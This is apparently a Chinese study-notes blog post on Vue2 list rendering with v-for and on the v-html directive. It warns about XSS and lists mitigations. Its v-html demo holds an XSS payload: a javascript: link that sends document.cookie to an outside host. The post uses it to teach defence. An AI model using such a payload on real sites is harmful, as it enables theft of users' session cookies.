Vue 响应式渲染 - 列表布局和v-html

JSON_L2025-01-29 17:10

Vue 渐进式JavaScript 框架 基于Vue2的学习笔记 - Vue 响应式渲染 - 列表布局和v-html

目录

列表布局

简单渲染列表

显示索引值

点击变色

V-html

作用

注意

采用策略

应用

总结

列表布局

简单渲染列表

Data中设置状态,是一个数组格式的默认信息。

然后设置v-for循环渲染ul的li元素。

示例如下:

html 复制代码 
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <script src="../lib/vue.js"></script>
</head>
<body>
<div id="box">
    <ul>
        <li v-for="item in datalist">{
  
  {item}}</li>
    </ul>
</div>
<script>
    new Vue({
        el: "#box", // element
        data: {
            datalist:["zhangsan", "lisi", "wangwu", "xiaoming"]
        },
        methods: {}
    })
</script>
</body>
</html>

效果如下:

显示索引值

显示列表数据的索引值。

示例如下:

html 复制代码 
<ul>
    <li v-for="(item, index) in datalist">
        {
  
  {item}}--{
  
  {index}}
    </li>
</ul>

效果如下:

点击变色

创建一个列表,点击哪一个行,哪一行显示选中效果。

示例如下:

html 复制代码 
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <style>
        .active {
            background: red;
        }
    </style>
    <script src="../lib/vue.js"></script>
</head>
<body>
<div id="box">
    <ul>
        <li v-for="(item, index) in datalist" :class="current === index ? 'active': ''"
            @click="handleClick(index)">
            {
  
  {item}}
        </li>
    </ul>
</div>
<script>
    new Vue({
        el: "#box", // element
        data: {
            current: 0,
            datalist: ['面朝大海,春暖花开', '从明天起,做一个幸福的人', '喂马、劈柴,周游世界'],
        },
        methods: {
            handleClick(index) {
                this.current = index
            }
        }
    })
</script>
</body>
</html>

实现效果:

V-html

作用

更新元素的innerHTML。

注意

内容按普通 HTML插入。不会作为 Vue 模板进行编译。如果试图使用 v-html 组合模板,可以重新考虑是否通过使用组件来替代。

在网站上动态渲染任意 HTML 是非常危险的,因为容易导致 xss 攻击。

在可信内容上,不用在用户提交的内容上。

采用策略

使用V-html 需防止XSS,CSRF

前端过滤

后台转义

给cookie加上属性httponly

应用

模拟ajax请求后端数据后,使用vue解析和v-html解析展示不同效果。

示例如下:

html 复制代码 
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
    <script src="../lib/vue.js"></script>
</head>
<body>
<div id="box">
    <div>{
  
  {mydanger}}</div>
    <div v-html="mydanger"></div>
    <button @click="handleAjax()">请求</button>
</div>
<script>
    new Vue({
        el: "#box", // element
        data: {
            mydanger: '',
        },
        methods: {
            handleAjax() {
                console.log('点击了按钮')
                // 此处为请求后端获取数据
                this.mydanger = "<a href=javascript:location.href='http://www.baidu.com?cookie='+document.cookie>震惊!!!点击查看</a>"
            }
        }
    })
</script>
</body>
</html>

效果如下:

点击链接后,会跳转链接并带着cookie,非常危险。

总结

Vue 渐进式JavaScript 框架 基于Vue2的学习笔记 - Vue 响应式渲染 - 列表布局和v-html

相关推荐
getapi19 小时前
在宝塔面板中部署 Vue 项目打包后的 dist 文件作为前端
前端·javascript·vue.js
59678515419 小时前
css浮动
前端·css·html
我想发发发20 小时前
已经安装了ROS环境却还是报错`ModuleNotFoundError: No module named ‘rclpy‘`
前端·人工智能·chrome·机器人
—Qeyser20 小时前
Flutter 组件通信完全指南
前端·javascript·flutter
松涛和鸣20 小时前
DAY55 Getting Started with ARM and IMX6ULL
linux·服务器·网络·arm开发·数据库·html
天天进步201520 小时前
从脚本到服务:5 分钟通过 Botasaurus 将你的爬虫逻辑转化为 Web API
前端·爬虫
沛沛老爹20 小时前
Web转AI架构篇:Agent Skills vs MCP-混合架构设计模式实战指南
java·前端·人工智能·架构·llm·rag
张张努力变强20 小时前
C++类和对象(一):inline函数、nullptr、类的定义深度解析
开发语言·前端·jvm·数据结构·c++·算法
Elcker21 小时前
JAVA-Web 项目研发中如何保持团队研发风格的统一
java·前端·javascript
selectDele21 小时前
Solid.js和React的比较
前端·javascript·react.js·solid.js
热门推荐
01GitHub 镜像站点022025 Telegram 最新免费社工库机器人(LetsTG可[特殊字符])搭建指南(含 Python 脚本)03Linux下V2Ray安装配置指南042025年大语言模型技术全景报告05UV安装并设置国内源06安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)07BongoCat - 跨平台键盘猫动画工具08Claude Code Skills 实用使用手册09Labelme从安装到标注:零基础完整指南10AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南